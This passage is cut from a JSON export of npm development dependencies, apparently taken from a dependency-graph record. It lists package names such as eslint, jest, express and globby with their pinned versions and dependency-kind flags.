","direct":false,"kind":"development","optional":false},{"id":13878388092,"package_name":"clone","ecosystem":"npm","requirements":"1.0.4","direct":false,"kind":"development","optional":false},{"id":13878388093,"package_name":"defer-to-connect","ecosystem":"npm","requirements":"2.0.1","direct":false,"kind":"development","optional":false},{"id":13878388094,"package_name":"define-lazy-prop","ecosystem":"npm","requirements":"2.0.0","direct":false,"kind":"development","optional":false},{"id":13878388095,"package_name":"define-properties","ecosystem":"npm","requirements":"1.1.3","direct":false,"kind":"development","optional":false},{"id":13878388096,"package_name":"degenerator","ecosystem":"npm","requirements":"3.0.1","direct":false,"kind":"development","optional":false},{"id":13878388097,"package_name":"escodegen","ecosystem":"npm","requirements":"1.14.3","direct":false,"kind":"development","optional":false},{"id":13878388098,"package_name":"estraverse","ecosystem":"npm","requirements":"4.3.0","direct":false,"kind":"development","optional":false},{"id":13878388099,"package_name":"levn","ecosystem":"npm","requirements":"0.3.0","direct":false,"kind":"development","optional":false},{"id":13878388100,"package_name":"optionator","ecosystem":"npm","requirements":"0.8.3","direct":false,"kind":"development","optional":false},{"id":13878388101,"package_name":"prelude-ls","ecosystem":"npm","requirements":"1.1.2","direct":false,"kind":"development","optional":false},{"id":13878388102,"package_name":"type-check","ecosystem":"npm","requirements":"0.3.2","direct":false,"kind":"development","optional":false},{"id":13878388103,"package_name":"del","ecosystem":"npm","requirements":"6.0.0","direct":false,"kind":"development","optional":false},{"id":13878388104,"package_name":"array-union","ecosystem":"npm","requirements":"2.1.0","direct":false,"kind":"development","optional":false},{"id":13878388105,"package_name":"globby","ecosystem":"npm","requirements":"11.1.0","direct":false,"kind":"development","optional":false},{"id":13878388106,"package_name":"delayed-stream","ecosystem":"npm","requirements":"1.0.0","direct":false,"kind":"development","optional":false},{"id":13878388107,"package_name":"depd","ecosystem":"npm","requirements":"1.1.2","direct":false,"kind":"development","optional":false},{"id":13878388108,"package_name":"destroy","ecosystem":"npm","requirements":"1.0.4","direct":false,"kind":"development","optional":false},{"id":13878388109,"package_name":"detect-newline","ecosystem":"npm","requirements":"3.1.0","direct":false,"kind":"development","optional":false},{"id":13878388110,"package_name":"detect-node","ecosystem":"npm","requirements":"2.0.4","direct":false,"kind":"development","optional":false},{"id":13878388111,"package_name":"didyoumean","ecosystem":"npm","requirements":"1.2.2","direct":false,"kind":"development","optional":false},{"id":13878388112,"package_name":"diff","ecosystem":"npm","requirements":"3.5.0","direct":false,"kind":"development","optional":false},{"id":13878388113,"package_name":"diff-sequences","ecosystem":"npm","requirements":"27.4.0","direct":false,"kind":"development","optional":false},{"id":13878388114,"package_name":"dir-glob","ecosystem":"npm","requirements":"3.0.1","direct":false,"kind":"development","optional":false},{"id":13878388115,"package_name":"dns-equal","ecosystem":"npm","requirements":"1.0.0","direct":false,"kind":"development","optional":false},{"id":13878388116,"package_name":"dns-packet","ecosystem":"npm","requirements":"1.3.1","direct":false,"kind":"development","optional":false},{"id":13878388117,"package_name":"dns-txt","ecosystem":"npm","requirements":"2.0.2","direct":false,"kind":"development","optional":false},{"id":13878388118,"package_name":"doctrine","ecosystem":"npm","requirements":"3.0.0","direct":false,"kind":"development","optional":false},{"id":13878388119,"package_name":"dom-converter","ecosystem":"npm","requirements":"0.2.0","direct":false,"kind":"development","optional":false},{"id":13878388120,"package_name":"dom-event-types","ecosystem":"npm","requirements":"1.0.0","direct":false,"kind":"development","optional":false},{"id":13878388121,"package_name":"dom-serializer","ecosystem":"npm","requirements":"1.3.2","direct":false,"kind":"development","optional":false},{"id":13878388122,"package_name":"domelementtype","ecosystem":"npm","requirements":"2.2.0","direct":false,"kind":"development","optional":false},{"id":13878388123,"package_name":"domhandler","ecosystem":"npm","requirements":"4.3.0","direct":false,"kind":"development","optional":false},{"id":13878388124,"package_name":"domutils","ecosystem":"npm","requirements":"2.8.0","direct":false,"kind":"development","optional":false},{"id":13878388125,"package_name":"dot-case","ecosystem":"npm","requirements":"3.0.4","direct":false,"kind":"development","optional":false},{"id":13878388126,"package_name":"dotenv","ecosystem":"npm","requirements":"7.0.0","direct":false,"kind":"development","optional":false},{"id":13878388127,"package_name":"duplexer","ecosystem":"npm","requirements":"0.1.2","direct":false,"kind":"development","optional":false},{"id":13878388128,"package_name":"ecc-jsbn","ecosystem":"npm","requirements":"0.1.2","direct":false,"kind":"development","optional":false},{"id":13878388129,"package_name":"editorconfig","ecosystem":"npm","requirements":"0.15.3","direct":false,"kind":"development","optional":false},{"id":13878388130,"package_name":"commander","ecosystem":"npm","requirements":"2.20.3","direct":false,"kind":"development","optional":false},{"id":13878388131,"package_name":"ee-first","ecosystem":"npm","requirements":"1.1.1","direct":false,"kind":"development","optional":false},{"id":13878388132,"package_name":"ejs","ecosystem":"npm","requirements":"3.1.6","direct":false,"kind":"development","optional":false},{"id":13878388133,"package_name":"electron-to-chromium","ecosystem":"npm","requirements":"1.4.47","direct":false,"kind":"development","optional":false},{"id":13878388134,"package_name":"emittery","ecosystem":"npm","requirements":"0.10.2","direct":false,"kind":"development","optional":false},{"id":13878388135,"package_name":"emoji-regex","ecosystem":"npm","requirements":"7.0.3","direct":false,"kind":"development","optional":false},{"id":13878388136,"package_name":"emojis-list","ecosystem":"npm","requirements":"3.0.0","direct":false,"kind":"development","optional":false},{"id":13878388137,"package_name":"encodeurl","ecosystem":"npm","requirements":"1.0.2","direct":false,"kind":"development","optional":false},{"id":13878388138,"package_name":"end-of-stream","ecosystem":"npm","requirements":"1.4.4","direct":false,"kind":"development","optional":false},{"id":13878388139,"package_name":"enhanced-resolve","ecosystem":"npm","requirements":"5.15.0","direct":false,"kind":"development","optional":false},{"id":13878388140,"package_name":"entities","ecosystem":"npm","requirements":"2.2.0","direct":false,"kind":"development","optional":false},{"id":13878388141,"package_name":"envinfo","ecosystem":"npm","requirements":"7.7.3","direct":false,"kind":"development","optional":false},{"id":13878388142,"package_name":"error-ex","ecosystem":"npm","requirements":"1.3.2","direct":false,"kind":"development","optional":false},{"id":13878388143,"package_name":"es-abstract","ecosystem":"npm","requirements":"1.19.1","direct":false,"kind":"development","optional":false},{"id":13878388144,"package_name":"object.assign","ecosystem":"npm","requirements":"4.1.2","direct":false,"kind":"development","optional":false},{"id":13878388145,"package_name":"es-module-lexer","ecosystem":"npm","requirements":"0.9.3","direct":false,"kind":"development","optional":false},{"id":13878388146,"package_name":"es-to-primitive","ecosystem":"npm","requirements":"1.2.1","direct":false,"kind":"development","optional":false},{"id":13878388147,"package_name":"escalade","ecosystem":"npm","requirements":"3.1.1","direct":false,"kind":"development","optional":false},{"id":13878388148,"package_name":"escape-html","ecosystem":"npm","requirements":"1.0.3","direct":false,"kind":"development","optional":false},{"id":13878388149,"package_name":"escape-string-regexp","ecosystem":"npm","requirements":"1.0.5","direct":false,"kind":"development","optional":false},{"id":13878388150,"package_name":"eslint","ecosystem":"npm","requirements":"8.7.0","direct":false,"kind":"development","optional":false},{"id":13878388151,"package_name":"eslint-plugin-vue","ecosystem":"npm","requirements":"8.3.0","direct":false,"kind":"development","optional":false},{"id":13878388152,"package_name":"eslint-scope","ecosystem":"npm","requirements":"7.1.0","direct":false,"kind":"development","optional":false},{"id":13878388153,"package_name":"eslint-utils","ecosystem":"npm","requirements":"3.0.0","direct":false,"kind":"development","optional":false},{"id":13878388154,"package_name":"eslint-visitor-keys","ecosystem":"npm","requirements":"2.1.0","direct":false,"kind":"development","optional":false},{"id":13878388155,"package_name":"eslint-visitor-keys","ecosystem":"npm","requirements":"1.3.0","direct":false,"kind":"development","optional":false},{"id":13878388156,"package_name":"eslint-webpack-plugin","ecosystem":"npm","requirements":"3.1.1","direct":false,"kind":"development","optional":false},{"id":13878388157,"package_name":"schema-utils","ecosystem":"npm","requirements":"3.1.1","direct":false,"kind":"development","optional":false},{"id":13878388158,"package_name":"ansi-styles","ecosystem":"npm","requirements":"4.2.1","direct":false,"kind":"development","optional":false},{"id":13878388159,"package_name":"chalk","ecosystem":"npm","requirements":"4.1.0","direct":false,"kind":"development","optional":false},{"id":13878388160,"package_name":"escape-string-regexp","ecosystem":"npm","requirements":"4.0.0","direct":false,"kind":"development","optional":false},{"id":13878388161,"package_name":"eslint-visitor-keys","ecosystem":"npm","requirements":"3.2.0","direct":false,"kind":"development","optional":false},{"id":13878388162,"package_name":"supports-color","ecosystem":"npm","requirements":"7.1.0","direct":false,"kind":"development","optional":false},{"id":13878388163,"package_name":"espree","ecosystem":"npm","requirements":"9.3.0","direct":false,"kind":"development","optional":false},{"id":13878388164,"package_name":"esprima","ecosystem":"npm","requirements":"4.0.1","direct":false,"kind":"development","optional":false},{"id":13878388165,"package_name":"esquery","ecosystem":"npm","requirements":"1.4.0","direct":false,"kind":"development","optional":false},{"id":13878388166,"package_name":"esrecurse","ecosystem":"npm","requirements":"4.3.0","direct":false,"kind":"development","optional":false},{"id":13878388167,"package_name":"estraverse","ecosystem":"npm","requirements":"5.3.0","direct":false,"kind":"development","optional":false},{"id":13878388168,"package_name":"esutils","ecosystem":"npm","requirements":"2.0.3","direct":false,"kind":"development","optional":false},{"id":13878388169,"package_name":"etag","ecosystem":"npm","requirements":"1.8.1","direct":false,"kind":"development","optional":false},{"id":13878388170,"package_name":"event-stream","ecosystem":"npm","requirements":"3.3.4","direct":false,"kind":"development","optional":false},{"id":13878388171,"package_name":"eventemitter3","ecosystem":"npm","requirements":"4.0.4","direct":false,"kind":"development","optional":false},{"id":13878388172,"package_name":"events","ecosystem":"npm","requirements":"3.3.0","direct":false,"kind":"development","optional":false},{"id":13878388173,"package_name":"execa","ecosystem":"npm","requirements":"5.1.1","direct":false,"kind":"development","optional":false},{"id":13878388174,"package_name":"get-stream","ecosystem":"npm","requirements":"6.0.1","direct":false,"kind":"development","optional":false},{"id":13878388175,"package_name":"exit","ecosystem":"npm","requirements":"0.1.2","direct":false,"kind":"development","optional":false},{"id":13878388176,"package_name":"expect","ecosystem":"npm","requirements":"28.1.1","direct":false,"kind":"development","optional":false},{"id":13878388177,"package_name":"express","ecosystem":"npm","requirements":"4.17.1","direct":false,"kind":"development","optional":false},{"id":13878388178,"package_name":"array-flatten","ecosystem":"npm","requirements":"1.1.1","direct":false,"kind":"development","optional":false},{"id":13878388179,"package_name":"extend","ecosystem":"npm","requirements":"3.0.2","direct":false,"kind":"development","optional":false},{"id":13878388180,"package_name":"extsprintf","ecosystem":"npm","requirements":"1.3.0","direct":false,"kind":"development","optional":false},{"id":13878388181,"package_name":"fast-deep-equal","ecosystem":"npm","requirements":"3.1.3","direct":false,"kind":"development","optional":false},{"id":13878388182,"package_name":"fast-glob","ecosystem":"npm","requirements":"3.2.11","direct":false,"kind":"development","optional":false},{"id":13878388183,"package_name":"fast-json-stable-stringify","ecosystem":"npm","requirements":"2.1.0","direct":false,"kind":"development","optional":false},{"id":13878388184,"package_name":"fast-levenshtein","ecosystem":"npm","requirements":"2.0.6","direct":false,"kind":"development","optional":false},{"id":13878388185,"package_name":"fastest-levenshtein","ecosystem":"npm","requirements":"1.0.12","direct":false,"kind":"development","optional":false},{"id":13878388186,"package_name":"fastq","ecosystem":"npm","requirements":"1.13.0","direct":false,"kind":"development","optional":false},{"id":13878388187,"package_name":"faye-websocket","ecosystem":"npm","requirements":"0.11.4","direct":false,"kind":"development","optional":false},{"id":13878388188,"package_name":"fb-watchman","ecosystem":"npm","requirements":"2.0.1","direct":false,"kind":"development","optional":false},{"id":13878388189,"package_name":"file-entry-cache","ecosystem":"npm","requirements":"6.0.1","direct":false,"kind":"development","optional":false},{"id":13878388190,"package_name":"file-loader","ecosystem":"npm","requirements":"6.2.0","direct":false,"kind":"development","optional":false},{"id":13878388191,"package_name":"loader-utils","ecosystem":"npm","requirements":"2.0.4","direct":false,"kind":"development","optional":false},{"id":13878388192,"package_name":"filelist","ecosystem":"npm","requirements":"1.0.2","direct":false,"kind":"development","optional":false},{"id":13878388193,"package_name":"fill-range","ecosystem":"npm","requirements":"7.0.1","direct":false,"kind":"development","optional":false},{"id":13878388194,"package_name":"finalhandler","ecosystem":"npm","requirements":"1.1.2","direct":false,"kind":"development","optional":false},{"id":13878388195,"package_name":"find-up","ecosystem":"npm","requirements":"4.1.0","direct":false,"kind":"development","optional":false},{"id":13878388196,"package_name":"path-exists","ecosystem":"npm","requirements":"4.0.0","direct":false,"kind":"development","optional":false},{"id":13878388197,"package_name":"flat","ecosystem":"npm","requirements":"4.1.1","direct":false,"kind":"development","optional":false},{"id":13878388198,"package_name":"flat-cache","ecosystem":"npm","requirements":"3.0.4","direct":false,"kind":"development","optional":false},{"id":13878388199,"package_name":"is-buffer","ecosystem":"npm","requirements":"2.0.5","direct":false,"kind":"development","optional":false},{"id":13878388200,"package_name":"flatted","ecosystem":"npm","requirements":"3.2.4","direct":false,"kind":"development","optional":false},{"id":13878388201,"package_name":"follow-redirects","ecosystem":"npm","requirements":"1.14.7","direct":false,"kind":"development","optional":false},{"id":13878388202,"package_name":"foreach","ecosystem":"npm","requirements":"2.0.5","direct":false,"kind":"development","optional":false},{"id":13878388203,"package_name":"forever-agent","ecosystem":"npm","requirements":"0.6.1","direct":false,"kind":"development","optional":false},{"id":13878388204,"package_name":"form-data","ecosystem":"npm","requirements":"2.3.3","direct":false,"kind":"development","optional":false},{"id":13878388205,"package_name":"forwarded","ecosystem":"npm","requirements":"0.1.2","direct":false,"kind":"development","optional":false},{"id":13878388206,"package_name":"fresh","ecosystem":"npm","requirements":"0.5.2","direct":false,"kind":"development","optional":false},{"id":13878388207,"package_name":"from","ecosystem":"npm","requirements":"0.1.7","direct":false,"kind":"development","optional":false},{"id":13878388208,"package_name":"fs-extra","ecosystem":"npm","requirements":"8.1.0","direct":false,"kind":"development","optional":false},{"id":13878388209,"package_name":"fs-minipass","ecosystem":"npm","requirements":"2.1.0","direct":false,"kind":"development","optional":false},{"id":13878388210,"package_name":"fs-monkey","ecosystem":"npm","requirements":"1.0.3","direct":false,"kind":"development","optional":false},{"id":13878388211,"package_name":"fs-readdir-recursive","ecosystem":"npm","requirements":"1.1.0","direct":false,"kind":"development","optional":false},{"id":13878388212,"package_name":"fs.realpath","ecosystem":"npm","requirements":"1.0.0","direct":false,"kind":"development","optional":false},{"id":13878388213,"package_name":"fsevents","ecosystem":"npm","requirements":"2.3.2","direct":false,"kind":"development","optional":false},{"id":13878388214,"package_name":"ftp","ecosystem":"npm","requirements":"0.3.10","direct":false,"kind":"development","optional":false},{"id":13878388215,"package_name":"isarray","ecosystem":"npm","requirements":"0.0.1","direct":false,"kind":"development","optional":false},{"id":13878388216,"package_name":"readable-stream","ecosystem":"npm","requirements":"1.1.14","direct":false,"kind":"development","optional":false},{"id":13878388217,"package_name":"string_decoder","ecosystem":"npm","requirements":"0.10.31","direct":false,"kind":"development","optional":false},{"id":13878388218,"package_name":"function-bind","ecosystem":"npm","requirements":"1.1.1","direct":false,"kind":"development","optional":false},{"id":13878388219,"package_name":"functional-red-black-tree","ecosystem":"npm","requirements":"1.0.1","direct":false,"kind":"development","optional":false},{"id":13878388220,"package_name":"geckodriver","ecosystem":"npm","requirements":"3.0.1","direct":false,"kind":"development","optional":false},{"id":13878388221,"package_name":"gensync","ecosystem":"npm","requirements":"1.0.0-beta.2","direct":false,"kind":"development","optional":false},{"id":13878388222,"package_name":"get-caller-file","ecosystem":"npm","requirements":"2.0.5","direct":false,"kind":"development","optional":false},{"id":13878388223,"package_name":"get-intrinsic","ecosystem":"npm","requirements":"1.1.1","direct":false,"kind":"development","optional":false},{"id":13878388224,"package_name":"get-package-type","ecosystem":"npm","requirements":"0.1.0","direct":false,"kind":"development","optional":false},{"id":13878388225,"package_name":"get-stream","ecosystem":"npm","requirements":"5.2.0","direct":false,"kind":"development","optional":false},{"id":13878388226,"package_name":"get-symbol-description","ecosystem":"npm","requirements":"1.0.0","direct":false,"kind":"development","optional":false},{"id":13878388227,"package_name":"get-uri","ecosystem":"npm","requirements":"3.0.2","direct":false,"kind":"development","optional":false},{"id":13878388228,"package_name":"file-uri-to-path","ecosystem":"npm","requirements":"2.0.0","direct":false,"kind":"development","optional":false},{"id":13878388229,"package_name":"getpass","ecosystem":"npm","requirements":"0.1.7","direct":false,"kind":"development","optional":false},{"id":13878388230,"package_name":"glob","ecosystem":"npm","requirements":"7.1.6","direct":false,"kind":"development","optional":false},{"id":13878388231,"package_name":"glob-parent","ecosystem":"npm","requirements":"6.0.2","direct":false,"kind":"development","optional":false},{"id":13878388232,"package_name":"glob-to-regexp","ecosystem":"npm","requirements":"0.4.1","direct":false,"kind":"development","optional":false},{"id":13878388233,"package_name":"globals","ecosystem":"npm","requirements":"11.12.0","direct":false,"kind":"development","optional":false},{"id":13878388234,"package_name":"globby","ecosystem":"npm","requirements":"12.2.0","direct":false,"kind":"development","optional":false},{"id":13878388235,"package_name":"slash","ecosystem":"npm","requirements":"4.0.0","direct":false,"kind":"development","optional":false},{"id":13878388236,"package_name":"got","ecosystem":"npm","requirements":"11.8.2","direct":false,"kind":"development","optional":false},{"id":13878388237,"package_name":"graceful-fs","ecosystem":"npm","requirements":"4.2.9","direct":false,"kind":"development","optional":false},{"id":13878388238,"package_name":"growl","ecosystem":"npm","requirements":"1.10.5","direct":false,"kind":"development","optional":false},{"id":13878388239,"package_name":"handle-thing","ecosystem":"npm","requirements":"2.0.1","direct":false,"kind":"development","optional":false},{"id":13878388240,"package_name":"har-schema","ecosystem":"npm","requirements":"2.0.0","direct":false,"kind":"development","optional":false},{"id":13878388241,"package_name":"har-validator","ecosystem":"npm","requirements":"5.1.3","direct":false,"kind":"development","optional":false},{"id":13878388242,"package_name":"has","ecosystem":"npm","requirements":"1.0.3","direct":false,"kind":"development","optional":false},{"id":13878388243,"package_name":"has-bigints","ecosystem":"npm","requirements":"1.0.1","direct":false,"kind":"development","optional":false},{"id":13878388244,"package_name":"has-flag","ecosystem":"npm","requirements":"3.0.0","direct":false,"kind":"development","optional":false},{"id":13878388245,"package_name":"has-symbols","ecosystem":"npm","requirements":"1.0.2","direct":false,"kind":"development","optional":false},{"id":13878388246,"package_name":"has-tostringtag","ecosystem":"npm","requirements":"1.0.0","direct":false,"kind":"development","optional":false},{"id":13878388247,"package_name":"hash-sum","ecosystem":"npm","requirements":"1.0.2","direct":false,"kind":"development","optional":false},{"id":13878388248,"package_name":"he","ecosystem":"npm","requirements":"1.2.0","direct":false,"kind":"development","optional":false},{"id":13878388249,"package_name":"hpack.js","ecosystem":"npm","requirements":"2.1.6","direct":false,"kind":"development","optional":false},{"id":13878388250,"package_name":"html-encoding-sniffer","ecosystem":"npm","requirements":"3.0.0","direct":false,"kind":"development","optional":false},{"id":13878388251,"package_name":"html-entities","ecosystem":"npm","requirements":"2.3.2","direct":false,"kind":"development","optional":false},{"id":13878388252,"package_name":"html-escaper","ecosystem":"npm","requirements":"2.0.2","direct":false,"kind":"development","optional":false},{"id":13878388253,"package_name":"html-minifier-terser","ecosystem":"npm","requirements":"6.1.0","direct":false,"kind":"development","optional":false},{"id":13878388254,"package_name":"commander","ecosystem":"npm","requirements":"8.3.0","direct":false,"kind":"development","optional":false},{"id":13878388255,"package_name":"html-webpack-plugin","ecosystem":"npm","requirements":"5.5.0","direct":false,"kind":"development","optional":false},{"id":13878388256,"package_name":"htmlparser2","ecosystem":"npm","requirements":"6.1.0","direct":false,"kind":"development","optional":false},{"id":13878388257,"package_name":"http-cache-semantics","ecosystem":"npm","requirements":"4.1.0","direct":false,"kind":"development","optional":false},{"id":13878388258,"package_name":"http-deceiver","ecosystem":"npm","requirements":"1.2.7","direct":false,"kind":"development","optional":false},{"id":13878388259,"package_name":"http-errors","ecosystem":"npm","requirements":"1.7.3","direct":false,"kind":"development","optional":false},{"id":13878388260,"package_name":"http-parser-js","ecosystem":"npm","requirements":"0.5.5","direct":false,"kind":"development","optional":false},{"id":13878388261,"package_name":"http-proxy","ecosystem":"npm","requirements":"1.18.1","direct":false,"kind":"development","optional":false},{"id":13878388262,"package_name":"http-proxy-agent","ecosystem":"npm","requirements":"4.0.1","direct":false,"kind":"development","optional":false},{"id":13878388263,"package_name":"http-proxy-middleware","ecosystem":"npm","requirements":"2.0.1","direct":false,"kind":"development","optional":false},{"id":13878388264,"package_name":"http-server","ecosystem":"npm","requirements":"14.1.0","direct":false,"kind":"development","optional":false},{"id":13878388265,"package_name":"http-signature","ecosystem":"npm","requirements":"1.2.0","direct":false,"kind":"development","optional":false},{"id":13878388266,"package_name":"http2-wrapper","ecosystem":"npm","requirements":"1.0.3","direct":false,"kind":"development","optional":false},{"id":13878388267,"package_name":"https-proxy-agent","ecosystem":"npm","requirements":"5.0.0","direct":false,"kind":"development","optional":false},{"id":13878388268,"package_name":"human-signals","ecosystem":"npm","requirements":"2.1.0","direct":false,"kind":"development","optional":false},{"id":13878388269,"package_name":"iconv-lite","ecosystem":"npm","requirements":"0.4.24","direct":false,"kind":"development","optional":false},{"id":13878388270,"package_name":"ieee754","ecosystem":"npm","requirements":"1.2.1","direct":false,"kind":"development","optional":false},{"id":13878388271,"package_name":"ignore","ecosystem":"npm","requirements":"5.2.0","direct":false,"kind":"development","optional":false},{"id":13878388272,"package_name":"import-fresh","ecosystem":"npm","requirements":"3.2.1","direct":false,"kind":"development","optional":false},{"id":13878388273,"package_name":"resolve-from","ecosystem":"npm","requirements":"4.0.0","direct":false,"kind":"development","optional":false},{"id":13878388274,"package_name":"import-local","ecosystem":"npm","requirements":"3.1.0","direct":false,"kind":"development","optional":false},{"id":13878388275,"package_name":"imurmurhash","ecosystem":"npm","requirements":"0.1.4","direct":false,"kind":"development","optional":false},{"id":13878388276,"package_name":"indent-string","ecosystem":"npm","requirements":"4.0.0","direct":false,"kind":"development","optional":false},{"id":13878388277,"package_name":"inflight","ecosystem":"npm","requirements":"1.0.6","direct":false,"kind":"development","optional":false},{"id":13878388278,"package_name":"inherits","ecosystem":"npm","requirements":"2.0.4","direct":false,"kind":"development","optional":false},{"id":13878388279,"package_name":"ini","ecosystem":"npm","requirements":"1.3.5","direct":false,"kind":"development","optional":false},{"id":13878388280,"package_name":"internal-slot","ecosystem":"npm","requirements":"1.0.3","direct":false,"kind":"development","optional":false},{"id":13878388281,"package_name":"interpret","ecosystem":"npm","requirements":"2.2.0","direct":false,"kind":"development","optional":false},{"id":13878388282,"package_name":"ip","ecosystem":"npm","requirements":"1.1.5","direct":false,"kind":"development","optional":false},{"id":13878388283,"package_name":"ipaddr.js","ecosystem":"npm","requirements":"1.9.1","direct":false,"kind":"development","optional":false},{"id":13878388284,"package_name":"is-arguments","ecosystem":"npm","requirements":"1.0.4","direct":false,"kind":"development","optional":false},{"id":13878388285,"package_name":"is-arrayish","ecosystem":"npm","requirements":"0.2.1","direct":false,"kind":"development","optional":false},{"id":13878388286,"package_name":"is-bigint","ecosystem":"npm","requirements":"1.0.4","direct":false,"kind":"development","optional":false},{"id":13878388287,"package_name":"is-binary-path","ecosystem":"npm","requirements":"2.1.0","direct":false,"kind":"development","optional":false},{"id":13878388288,"package_name":"is-boolean-object","ecosystem":"npm","requirements":"1.1.2","direct":false,"kind":"development","optional":false},{"id":13878388289,"package_name":"is-buffer","ecosystem":"npm","requirements":"1.1.6","direct":false,"kind":"development","optional":false},{"id":13878388290,"package_name":"is-callable","ecosystem":"npm","requirements":"1.2.4","direct":false,"kind":"development","optional":false},{"id":13878388291,"package_name":"is-core-module","ecosystem":"npm","requirements":"2.8.1","direct":false,"kind":"development","optional":false},{"id":13878388292,"package_name":"is-date-object","ecosystem":"npm","requirements":"1.0.2","direct":false,"kind":"development","optional":false},{"id":13878388293,"package_name":"is-docker","ecosystem":"npm","requirements":"2.2.1","direct":false,"kind":"development","optional":false},{"id":13878388294,"package_name":"is-extendable","ecosystem":"npm","requirements":"0.1.1","direct":false,"kind":"development","optional":false},{"id":13878388295,"package_name":"is-extglob","ecosystem":"npm","requirements":"2.1.1","direct":false,"kind":"development","optional":false},{"id":13878388296,"package_name":"is-fullwidth-code-point","ecosystem":"npm","requirements":"2.0.0","direct":false,"kind":"development","optional":false},{"id":13878388297,"package_name":"is-generator-fn","ecosystem":"npm","requirements":"2.1.0","direct":false,"kind":"development","optional":false},{"id":13878388298,"package_name":"is-generator-function","ecosystem":"npm","requirements":"1.0.10","direct":false,"kind":"development","optional":false},{"id":13878388299,"package_name":"is-glob","ecosystem":"npm","requirements":"4.0.3","direct":false,"kind":"development","optional":false},{"id":13878388300,"package_name":"is-interactive","ecosystem":"npm","requirements":"1.0.0","direct":false,"kind":"development","optional":false},{"id":13878388301,"package_name":"is-negative-zero","ecosystem":"npm","requirements":"2.0.2","direct":false,"kind":"development","optional":false},{"id":13878388302,"package_name":"is-number","ecosystem":"npm","requirements":"7.0.0","direct":false,"kind":"development","optional":false},{"id":13878388303,"package_name":"is-number-object","ecosystem":"npm","requirements":"1.0.6","direct":false,"kind":"development","optional":false},{"id":13878388304,"package_name":"is-path-cwd","ecosystem":"npm","requirements":"2.2.0","direct":false,"kind":"development","optional":false},{"id":13878388305,"package_name":"is-path-inside","ecosystem":"npm","requirements":"3.0.3","direct":false,"kind":"development","optional":false},{"id":13878388306,"package_name":"is-plain-obj","ecosystem":"npm","requirements":"3.0.0","direct":false,"kind":"development","optional":false},{"id":13878388307,"package_name":"is-plain-object","ecosystem":"npm","requirements":"2.0.4","direct":false,"kind":"development","optional":false},{"id":13878388308,"package_name":"is-regex","ecosystem":"npm","requirements":"1.1.4","direct":false,"kind":"development","optional":false},{"id":13878388309,"package_name":"is-shared-array-buffer","ecosystem":"npm","requirements":"1.0.1","direct":false,"kind":"development","optional":false},{"id":13878388310,"package_name":"is-stream","ecosystem":"npm","requirements":"2.0.1","direct":false,"kind":"development","optional":false},{"id":13878388311,"package_name":"is-string","ecosystem":"npm","requirements":"1.0.7","direct":false,"kind":"development","optional":false},{"id":13878388312,"package_name":"is-symbol","ecosystem":"npm","requirements":"1.0.3","direct":false,"kind":"development","optional":false},{"id":13878388313,"package_name":"is-typed-array","ecosystem":"npm","requirements":"1.1.8","direct":false,"kind":"development","optional":false},{"id":13878388314,"package_name":"is-typedarray","ecosystem":"npm","requirements":"1.0.0","direct":false,"kind":"development","optional":false},{"id":13878388315,"package_name":"is-weakref","ecosystem":"npm","requirements":"1.0.2","direct":false,"kind":"development","optional":false},{"id":13878388316,"package_name":"is-whitespace","ecosystem":"npm","requirements":"0.3.0","direct":false,"kind":"development","optional":false},{"id":13878388317,"package_name":"is-wsl","ecosystem":"npm","requirements":"2.2.0","direct":false,"kind":"development","optional":false},{"id":13878388318,"package_name":"isarray","ecosystem":"npm","requirements":"1.0.0","direct":false,"kind":"development","optional":false},{"id":13878388319,"package_name":"isexe","ecosystem":"npm","requirements":"2.0.0","direct":false,"kind":"development","optional":false},{"id":13878388320,"package_name":"isobject","ecosystem":"npm","requirements":"3.0.1","direct":false,"kind":"development","optional":false},{"id":13878388321,"package_name":"isstream","ecosystem":"npm","requirements":"0.1.2","direct":false,"kind":"development","optional":false},{"id":13878388322,"package_name":"istanbul-lib-coverage","ecosystem":"npm","requirements":"3.2.0","direct":false,"kind":"development","optional":false},{"id":13878388323,"package_name":"istanbul-lib-instrument","ecosystem":"npm","requirements":"5.2.0","direct":false,"kind":"development","optional":false},{"id":13878388324,"package_name":"istanbul-lib-report","ecosystem":"npm","requirements":"3.0.0","direct":false,"kind":"development","optional":false},{"id":13878388325,"package_name":"istanbul-lib-source-maps","ecosystem":"npm","requirements":"4.0.1","direct":false,"kind":"development","optional":false},{"id":13878388326,"package_name":"debug","ecosystem":"npm","requirements":"4.3.4","direct":false,"kind":"development","optional":false},{"id":13878388327,"package_name":"istanbul-reports","ecosystem":"npm","requirements":"3.1.4","direct":false,"kind":"development","optional":false},{"id":13878388328,"package_name":"jake","ecosystem":"npm","requirements":"10.8.2","direct":false,"kind":"development","optional":false},{"id":13878388329,"package_name":"jest","ecosystem":"npm","requirements":"28.1.1","direct":false,"kind":"development","optional":false},{"id":13878388330,"package_name":"jest-changed-files","ecosystem":"npm","requirements":"28.0.2","direct":false,"kind":"development","optional":false},{"id":13878388331,"package_name":"jest-circus","ecosystem":"npm","requirements":"28.1.1","direct":false,"kind":"development","optional":false},{"id":13878388332,"package_name":"jest-cli","ecosystem":"npm","requirements":"28.1.1","direct":false,"kind":"development","optional":false},{"id":13878388333,"package_name":"jest-config","ecosystem":"npm","requirements":"28.1.1","direct":false,"kind":"development","optional":false},{"id":13878388334,"package_name":"jest-diff","ecosystem":"npm","requirements":"27.4.6","direct":false,"kind":"development","optional":false},{"id":13878388335,"package_name":"jest-docblock","ecosystem":"npm","requirements":"28.1.1","direct":false,"kind":"development","optional":false},{"id":13878388336,"package_name":"jest-each","ecosystem":"npm","requirements":"28.1.1","direct":false,"kind":"development","optional":false},{"id":13878388337,"package_name":"jest-environment-node","ecosystem":"npm","requirements":"28.1.1","direct":false,"kind":"development","optional":false},{"id":13878388338,"package_name":"jest-get-type","ecosystem":"npm","requirements":"27.4.0","direct":false,"kind":"development","optional":false},{"id":13878388339,"package_name":"jest-haste-map","ecosystem":"npm","requirements":"28.1.1","direct":false,"kind":"development","optional":false},{"id":13878388340,"package_name":"jest-leak-detector","ecosystem":"npm","requirements":"28.1.1","direct":false,"kind":"development","optional":false},{"id":13878388341,"package_name":"jest-matcher-utils","ecosystem":"npm","requirements":"28.1.1","direct":false,"kind":"development","optional":false},{"id":13878388342,"package_name":"diff-sequences","ecosystem":"npm","requirements":"28.1.1","direct":false,"kind":"development","optional":false},{"id":13878388343,"package_name":"jest-diff","ecosystem":"npm","requirements":"28.1.1","direct":false,"kind":"development","optional":false},{"id":13878388344,"package_name":"jest-message-util","ecosystem":"npm","requirements":"28.1.1","direct":false,"kind":"development","optional":false},{"id":13878388345,"package_name":"jest-mock","ecosystem":"npm","requirements":"28.1.1","direct":false,"kind":"development","o